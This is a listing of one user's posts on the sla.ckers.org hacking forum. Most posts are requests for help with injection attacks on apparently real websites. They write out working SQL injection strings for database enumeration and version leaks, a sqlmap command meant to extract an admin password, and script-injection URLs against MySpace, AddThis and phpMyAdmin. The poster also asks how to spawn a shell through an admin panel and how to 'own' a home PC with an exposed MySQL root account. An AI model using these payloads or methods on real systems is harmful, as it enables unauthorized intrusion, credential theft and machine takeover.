sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 2
Results 1 - 30 of 48
4 years ago
GaSmo
http://ha.ckers.org/xss.html here you find some XSS with style
Forum: XSS Info
4 years ago
GaSmo
Hey, i've found a LFI Bug in a "security" website. But I don't get access to error.log, seems like i only can include files within /www/ /index.php?page=../../etc/httpd/logs/acces_log%00 Warning: file_exists() : open_basedir restriction in effect. File(../../etc/httpd/logs/acces_log.php) is not within the allowed path(s): (/www/htdocs/w00a68a8/:/tmp:/usr/bin:/www/htdocs/w00a68a
Forum: SQL and Code Injection
4 years ago
GaSmo
Hey there, found a page of a big av, with a xss hole. i can place " to break content of a metatag, problem here is, that everything after ";" will be deleted. so is there any other way? this url: &q=gasm-1'" http-equiv="refresh" content="23; URL=http://de.selfhtml.org/"> will get this code: <meta name="keywords" content="
Forum: XSS Info
4 years ago
GaSmo
content.php?Mid=2%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20--%20-
Forum: SQL and Code Injection
4 years ago
GaSmo
$query = "UPDATE newsletter_subscribe" . " SET enabled = 0 WHERE id='".$subscriber_id."'"; is there a way to update other vars too if $subscriber_id is injectable?
Forum: SQL and Code Injection
4 years ago
GaSmo
Hi, found a blind sql injection in a newsletterscript. &subscriber=23' AND '1'='1 - fine &subscriber=23' AND '1'='11 - error so i thought sqlmap would be fine to get my admin password. sqlmap.exe -u "http://xxx.com/index.php?subscriber=23" -p "subscriber" --prefix "'" --postfix "AND '1'='1" as i run this first time, sqlmap shows me t
Forum: SQL and Code Injection
4 years ago
GaSmo
Hi there, was just taking a look at one of these "trusted online shop sign" sites. all listed shops are safe against sqli, xss, and so on, there are a lot of these sites (like mcafee-secure sign). first Shop is an e:commerce Shop, coID/-1' gives me: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to
Forum: SQL and Code Injection
4 years ago
GaSmo
ha! Ok, sry searched with wrong parameters. Styles are the magic way to get it work. thanks :) ps: damned phpmyadmin token ;)
Forum: XSS Info
4 years ago
GaSmo
Hi, I found a way to inject code, but got a problem to start it. <input type="hidden" name="rows" value=""/> I can inject into value: <input type="hidden" name="zero_rows" value="" onmouseover="alert(23)" /> U can see, the onmouseover will never trigger cuz the type is hidden. Do one of you guys know a
Forum: XSS Info
4 years ago
GaSmo
Hi there, still having problems with my xss in my cms. Only can run an onmouseover - xss is in a form tag: <form action="admin/index.php?menus" onmouseover=alert(23)" method="post" name="menu"> (works fine) next step I think i have to go, is to document.write my XSS Payload. But this doesn't work. XSS-code: " onmouseover="document.wri
Forum: XSS Info
4 years ago
GaSmo
sry, i don't get it. for example, i work with a cms, found a xss hole in one site of the backend - but want to get information from another site - this will work as long as both sites are on same domain? admin.php?function=pictures&name=XSS <- xssable site admin.php?function=database <- site with information i need, for example: <input type="text" name="user&
Forum: XSS Info
5 years ago
GaSmo
Hey, thx for answer, but i want to do it on myself :P You're right, last injections i did were mysql, so maybe this will be my problem. so i read some tutorials bout mssql. via: Hunter' and+1=convert(int,@@version)-- - i get version of server. Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition
Forum: SQL and Code Injection
5 years ago
GaSmo
Hi, got some problems with an injection into a MSSQL Db. &user=Hunter' ORDER BY 15-- - works fine, page is displayed normal. ORDER BY 16 gives me this error: Timestamp: {ts '2009-09-16 11:54:47'} Type: Database Error Message: Error Executing Database Query. The ORDER BY position number 16 is out of range of the number of items in the select list. <br>The error occurred on line 49
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey there, I just tried to spawn a shell via the ACP of a WBB 2.3.6 Never did it before, but I thought it should work with injecting phpcode into a template. So i edited forgotpw template and added some php and html code. The htmlcode works fine, but the php code will not work. So someone plz can tell me, how I can spawn a shell while I have access to the ACP? greetz
Forum: SQL and Code Injection
5 years ago
GaSmo
I found a page with an sql injection. It's something like select * from bla where id = so, i found user and pass from user.mysql but phpmyadmin isn't reachable from anyone other than localhost. With loadfile i can read files like boot.ini but Magicquotes is turned on, so I can't use into_outfile. It's a winXP homePC with WAMP - so is there any other way to own this machine?
Forum: SQL and Code Injection
5 years ago
GaSmo
ok, so now I know that the mysql user is root without a password. But I can't reach /phpmyadmin/ from internet, think it only accepts connections from localhost. So what way from now on you would go? I found a XSRF Exploit for XAMPP but the targeted page has WAMP, maybe it would work too, to change settings so I can reach myadmin via web. Apache version : Apache/2.0.58 (Win32) PHP ver
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey, once again it's me asking noobquestions. so, I get the names of the db's with: 1234+AND+1=0+UNION+SELECT+ALL+1,group_concat(schema_name),3,4,5+from+information_schema.schemata/* this gives me: information_schema,tf,mysql,phpmyadmin,ball,test but now I don't understand how to go on. 1234+AND+1=0+UNION+SELECT+ALL+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+
Forum: SQL and Code Injection
5 years ago
GaSmo
hey, once again I'm trying around with SQL Injection. search.php?zs=1&searchstring=test&cat=1+ORDER+BY+1-- shows me the page correct, search.php?zs=1&searchstring=test&cat=1+ORDER+BY+2-- gives me an "Unknown column '2' in 'order clause'" at the first time, now it shows the page correct. Same with for example 15. What's up there? Will it be possible to inject
Forum: SQL and Code Injection
5 years ago
GaSmo
hey, this doesn't work :| /index.php?bla=red is the real string, working. /index.php?bla=rexx gives me an error: Table 'usr_web2_1.rexx' doesn't exist so I think the query is something like: select * from '$bla' so this injection will be only possible by bruting the tablenames right?
Forum: SQL and Code Injection
5 years ago
GaSmo
If I use this injection: /index.php?&bla=reden+UNION+SELECT+ALL+1,2,3,4,5,6 (tried it from 1 to 1,2...19,20) I get an Error like: The used SELECT statements have a different number of columns So I'm on the right way, am I not?
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey, yesterday I read http://www.milw0rm.org/papers/225 Tried it on a page, did it till 1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()-- without problems. now I'm trying this on another page: URL: id=1'+ORDER+BY+1/* MySQL server version for the right syntax to use near 'OR id='1' ORDER BY 1/*' ORDER BY d
Forum: SQL and Code Injection
6 years ago
GaSmo
http://www.seaturtle.org/tracking/index.shtml?keyword=%22%3E%3Cscript%3Ealert(23)%3C/script%3E XSS works on clientside, so u can't use commandline commands.
Forum: XSS Info
6 years ago
GaSmo
Hey, on myspace.com there is a function to import your friends from gmx, web, yahoo and so on to myspace. Normally you can't enter more than 3 wrong passwords on gmx.de without having their bruteforceprotection start to work. on myspace.com, you can enter wrong passwords as often as u want. I just tried 10 wrong passwords and then the right one, and it worked without problems like timed
Forum: Full Disclosure
6 years ago
GaSmo
http://localhost/phpmyadmin/server_privileges.php?db=pension&token=0836b9c8e268a471e08e6120f9b53c3c&goto=db_operations.php&username=root&hostname=127.0.0.%22%3E%22%3E%3Cscript%3Ealert("GaSmo")%3C/script%3E
Forum: Full Disclosure
6 years ago
GaSmo
Hey there, I've found a XSS hole in phpmyadmin 2.11.4. The problem is, it's behind the token in the url: http://localhost/phpmyadmin/bla.php?db=test&token=8TOKEN6&goto=bla2.php&var="><script>alert(23)</script> If u know the used token it's no problem, but would there be any possibility without knowing it?
Forum: XSS Info
6 years ago
GaSmo
Hi, I had a little Idea. So, there are often XSS holes in myspace. I want to write a myspace-tracker. How it could work is already in my head/coded. Now I just need to know if flash inserted in this way: <object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="240" width="350" data="
Forum: XSS Info
6 years ago
GaSmo
now the subdomain is down, can't reach it anymore.
Forum: XSS Info
6 years ago
GaSmo
fixed? I always get a myspace Errorpage. Any possibility to inject js in your profile?
Forum: XSS Info
6 years ago
GaSmo
jup, is fixed! < & > are filtered, but maybe there's another way.
Forum: Full Disclosure
6 years ago
GaSmo
http://www.addthis.com/bookmark.php?v=12&winname=addthis&pub=myspace&lng=&s=undefined&url=http://google.de&title=--%3E%22%3E%3Cscript%3Ealert('gasmo')%3C/script%3E this site is now also used by myspace.
Forum: Full Disclosure